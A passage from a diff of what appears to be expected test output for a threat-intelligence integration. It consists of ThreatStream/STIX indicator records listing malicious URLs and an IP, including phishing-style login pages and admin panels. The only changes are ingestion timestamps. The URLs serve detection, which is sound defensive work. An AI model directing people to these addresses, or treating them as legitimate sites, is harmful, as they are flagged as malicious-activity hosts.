'http://d98527ix.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:25.758Z\"}", "category": "threat", "type": "indicator", @@ -25526,7 +25526,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025859200Z", + "ingested": "2021-12-14T14:57:43.118414472Z", "original": "{\"created\":\"2020-02-21T02:53:31.865Z\",\"description\":\"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:53:31.865Z\",\"name\":\"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.865Z\"}", "category": "threat", "type": "indicator", @@ -25578,7 +25578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025862500Z", + "ingested": "2021-12-14T14:57:43.118414928Z", "original": "{\"created\":\"2020-02-21T02:53:31.9Z\",\"description\":\"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime\",\"id\":\"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-21T02:53:31.9Z\",\"name\":\"mal_url: http://perca.ir/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://perca.ir/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.9Z\"}", "category": "threat", "type": "indicator", @@ -25630,7 +25630,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025867400Z", + "ingested": "2021-12-14T14:57:43.118415327Z", "original": "{\"created\":\"2020-02-21T02:53:40.48Z\",\"description\":\"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:53:40.48Z\",\"name\":\"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:40.48Z\"}", "category": "threat", "type": "indicator", @@ -25682,7 +25682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025873900Z", + "ingested": "2021-12-14T14:57:43.118415715Z", "original": "{\"created\":\"2020-02-21T02:53:42.327Z\",\"description\":\"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--c9d733d6-25c7-4306-9246-c08194e3073a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-21T02:53:42.327Z\",\"name\":\"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:42.327Z\"}", "category": "threat", "type": "indicator", @@ -25734,7 +25734,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025879800Z", + "ingested": "2021-12-14T14:57:43.118416093Z", "original": "{\"created\":\"2020-02-21T02:53:58.967Z\",\"description\":\"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-21T02:53:58.967Z\",\"name\":\"mal_url: http://liweff.eu/kp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/kp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:58.967Z\"}", "category": "threat", "type": "indicator", @@ -25786,7 +25786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025886700Z", + "ingested": "2021-12-14T14:57:43.118416484Z", "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", "category": "threat", "type": "indicator", @@ -25831,7 +25831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025893400Z", + "ingested": "2021-12-14T14:57:43.118416964Z", "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", "category": "threat", "type": "indicator", @@ -25883,7 +25883,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025900100Z", + "ingested": "2021-12-14T14:57:43.118417431Z", "original": "{\"created\":\"2020-02-22T02:52:52.6Z\",\"description\":\"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime\",\"id\":\"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-22T02:52:52.6Z\",\"name\":\"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:52.6Z\"}", "category": "threat", "type": "indicator", @@ -25935,7 +25935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025906700Z", + "ingested": "2021-12-14T14:57:43.118417890Z", "original": "{\"created\":\"2020-02-22T02:52:53.322Z\",\"description\":\"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:52:53.322Z\",\"name\":\"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.322Z\"}", "category": "threat", "type": "indicator", @@ -25987,7 +25987,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025913700Z", + "ingested": "2021-12-14T14:57:43.118418382Z", "original": "{\"created\":\"2020-02-22T02:52:53.756Z\",\"description\":\"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:52:53.756Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.756Z\"}", "category": "threat", "type": "indicator", @@ -26039,7 +26039,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025920400Z", + "ingested": "2021-12-14T14:57:43.118419222Z", "original": "{\"created\":\"2020-02-22T02:52:53.779Z\",\"description\":\"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:53.779Z\",\"name\":\"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.779Z\"}", "category": "threat", "type": "indicator", @@ -26091,7 +26091,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025927100Z", + "ingested": "2021-12-14T14:57:43.118419691Z", "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://89.160.20.156/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", "category": "threat", "type": "indicator", @@ -26136,7 +26136,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025933600Z", + "ingested": "2021-12-14T14:57:43.118420127Z", "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", "category": "threat", "type": "indicator", @@ -26188,7 +26188,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025940400Z", + "ingested": "2021-12-14T14:57:43.118420643Z", "original": "{\"created\":\"2020-02-22T02:53:11.62Z\",\"description\":\"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:53:11.62Z\",\"name\":\"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:11.62Z\"}", "category": "threat", "type": "indicator", @@ -26240,7 +26240,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025947300Z", + "ingested": "2021-12-14T14:57:43.118421127Z", "original": "{\"created\":\"2020-02-22T02:53:34.685Z\",\"description\":\"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime\",\"id\":\"indicator--773fabfe-63b5-4681-8189-4dffad1747fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-46\"],\"modified\":\"2020-02-22T02:53:34.685Z\",\"name\":\"mal_url: http://ccilfov.ro/css/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ccilfov.ro/css/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.685Z\"}", "category": "threat", "type": "indicator", @@ -26285,7 +26285,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025954Z", + "ingested": "2021-12-14T14:57:43.118421515Z", "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", "category": "threat", "type": "indicator", @@ -26337,7 +26337,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025959200Z", + "ingested": "2021-12-14T14:57:43.118421898Z", "original": "{\"created\":\"2020-02-22T02:53:34.767Z\",\"description\":\"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:53:34.767Z\",\"name\":\"mal_url: http://nortonlilly.info/zeya/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/zeya/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.767Z\"}", "category": "threat", "type": "indicator", @@ -26389,7 +26389,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025962400Z", + "ingested": "2021-12-14T14:57:43.118422298Z", "original": "{\"created\":\"2020-02-22T02:53:36.179Z\",\"description\":\"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:53:36.179Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:36.179Z\"}", "category": "threat", "type": "indicator", @@ -26441,7 +26441,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025967200Z", + "ingested": "2021-12-14T14:57:43.118422684Z", "original": "{\"created\":\"2020-02-22T02:53:45.219Z\",\"description\":\"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--8d2d349a-763b-406b-ba8c-8ba684058028\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-22T02:53:45.219Z\",\"name\":\"mal_url: http://51.83.200.179/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.83.200.179/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:45.219Z\"}", "category": "threat", "type": "indicator", @@ -26493,7 +26493,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025972200Z", + "ingested": "2021-12-14T14:57:43.118423067Z", "original": "{\"created\":\"2020-02-22T02:53:56.922Z\",\"description\":\"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--965a2554-cc08-488c-8d81-a29e8402eec1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-22T02:53:56.922Z\",\"name\":\"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:56.922Z\"}", "category": "threat", "type": "indicator", @@ -26545,7 +26545,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025978100Z", + "ingested": "2021-12-14T14:57:43.118423543Z", "original": "{\"created\":\"2020-02-22T02:54:18.93Z\",\"description\":\"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:54:18.93Z\",\"name\":\"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.93Z\"}", "category": "threat", "type": "indicator", @@ -26590,7 +26590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025981700Z", + "ingested": "2021-12-14T14:57:43.118423979Z", "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", "category": "threat", "type": "indicator", @@ -26642,7 +26642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025986500Z", + "ingested": "2021-12-14T14:57:43.118424456Z", "original": "{\"created\":\"2020-02-22T02:54:27.432Z\",\"description\":\"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:27.432Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.432Z\"}", "category": "threat", "type": "indicator", @@ -26694,7 +26694,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025991100Z", + "ingested": "2021-12-14T14:57:43.118425102Z", "original": "{\"created\":\"2020-02-22T02:54:27.479Z\",\"description\":\"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:27.479Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.479Z\"}", "category": "threat", "type": "indicator", @@ -26746,7 +26746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025995100Z", + "ingested": "2021-12-14T14:57:43.118425537Z", "original": "{\"created\":\"2020-02-22T02:54:29.634Z\",\"description\":\"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--2b38be23-b226-460e-9b17-4480e930f271\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:29.634Z\",\"name\":\"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.634Z\"}", "category": "threat", "type": "indicator", @@ -26798,7 +26798,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025999300Z", + "ingested": "2021-12-14T14:57:43.118425966Z", "original": "{\"created\":\"2020-02-22T02:54:29.689Z\",\"description\":\"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-22T02:54:29.689Z\",\"name\":\"mal_url: http://pay-robokassa.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pay-robokassa.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.689Z\"}", "category": "threat", "type": "indicator", @@ -26850,7 +26850,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026002700Z", + "ingested": "2021-12-14T14:57:43.118426429Z", "original": "{\"created\":\"2020-02-22T02:54:47.42Z\",\"description\":\"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a15df968-dec6-4122-811e-1144011d0653\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:47.42Z\",\"name\":\"mal_url: http://nortonlilly.info/jb/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jb/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:47.42Z\"}", "category": "threat", "type": "indicator", @@ -26902,7 +26902,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026007500Z", + "ingested": "2021-12-14T14:57:43.118427117Z", "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://89.160.20.156/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", "category": "threat", "type": "indicator", @@ -26954,7 +26954,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026014500Z", + "ingested": "2021-12-14T14:57:43.118427505Z", "original": "{\"created\":\"2020-02-22T02:54:49.84Z\",\"description\":\"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:49.84Z\",\"name\":\"mal_url: http://nortonlilly.info/ace1/st/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace1/st/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:49.84Z\"}", "category": "threat", "type": "indicator", @@ -27006,7 +27006,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026018700Z", + "ingested": "2021-12-14T14:57:43.118427895Z", "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://89.160.20.156/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", "category": "threat", "type": "indicator", @@ -27058,7 +27058,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026047100Z", + "ingested": "2021-12-14T14:57:43.118428391Z", "original": "{\"created\":\"2020-02-22T02:54:51.08Z\",\"description\":\"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:51.08Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.08Z\"}", "category": "threat", "type": "indicator", @@ -27110,7 +27110,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026050900Z", + "ingested": "2021-12-14T14:57:43.118428799Z", "original": "{\"created\":\"2020-02-22T02:54:57.998Z\",\"description\":\"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-22T02:54:57.998Z\",\"name\":\"mal_url: http://dronius267.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dronius267.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:57.998Z\"}", "category": "threat", "type": "indicator", @@ -27162,7 +27162,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026056Z", + "ingested": "2021-12-14T14:57:43.118429260Z", "original": "{\"created\":\"2020-02-22T02:54:58.082Z\",\"description\":\"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: 